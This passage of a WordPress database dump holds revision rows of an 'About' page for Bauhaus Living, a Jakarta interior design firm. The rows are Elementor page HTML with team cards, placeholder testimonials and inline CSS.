					\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:30:23','2023-09-22 08:30:23','',38,'https://bauhaus.futuremediatrix.com/?p=4841',0,'revision','',0),(4842,3,'2023-09-22 08:30:23','2023-09-22 08:30:23','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:30:23','2023-09-22 08:30:23','',38,'https://bauhaus.futuremediatrix.com/?p=4842',0,'revision','',0),(4843,3,'2023-09-22 08:32:38','2023-09-22 08:32:38','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" 